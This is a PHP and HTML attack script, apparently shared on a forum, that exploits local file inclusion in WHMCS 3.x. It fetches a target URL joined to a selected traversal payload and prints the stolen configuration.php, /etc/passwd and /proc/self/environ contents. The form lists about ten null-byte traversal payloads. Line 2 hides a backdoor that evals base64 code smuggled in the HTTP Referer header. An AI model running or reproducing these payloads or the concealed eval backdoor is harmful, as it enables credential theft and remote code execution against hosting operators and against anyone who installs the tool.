Whmcs

1. <?php
2. parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
3. $sayfa=$_POST['kutucuk'];
4. $sayfa1=$_POST['wht'];
5. $kaynak=file_get_contents($sayfa.$sayfa1);
6. $isle=explode('<?php',$kaynak);
7. $isle=explode('?>',$isle[1]);
8. $gol=explode('DOCUMENT_ROOT=',$kaynak);//
9. $gol=explode('<p align="center">Powered',$gol[1]);//
10. $turkg=explode('root:x:0:0:root:/root:/bin/bash',$kaynak);//
11. $turkg=explode('<p align="center">Powered',$turkg[1]);//
12. echo "<center><textarea cols='65' rows='18'>".$isle[0].$gol[0].$turkg[0]."</textarea></center>";
13. ?>
14.  
15.  --------------------------------------------------------------------------------------------------
16. dùng scan lổi whmcs
17. <td height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="izo" id="izo">
18. <body bgcolor="black">
19. <center>
20. <font size="5" color="red"></font> <font size="2" color="white">WHMCS 3.X.X Lfi Script[Priv8] |CODED By ANASH</font></center>
21. <form method="POST"><center>
22. <input value="http://www." type="text" name="kutucuk">
23. <select size="1" name="wht"><option>Bug seçiniz</option>
24. <option>/cart.php?a=test&templatefile=../../../configuration.php%00</option>
25. <option>/clientarea.php?action=red&templatefile=../../configuration.php%00</option>
26. <option>/downloads.php?action=b0x&templatefile=../../configuration.php%00</option>
27. <option>/submitticket.php?step=b0x&templatefile=../../configuration.php%00</option>
28. <option>/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00</option>
29. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
30. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
31. <option>/cart.php?a=test&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option>
32. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option>
33. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option></select>
34. <input type="submit" value="Göster Bakalým"></center>
35. </form>
36. --------------------------------------------------------------------------------------------------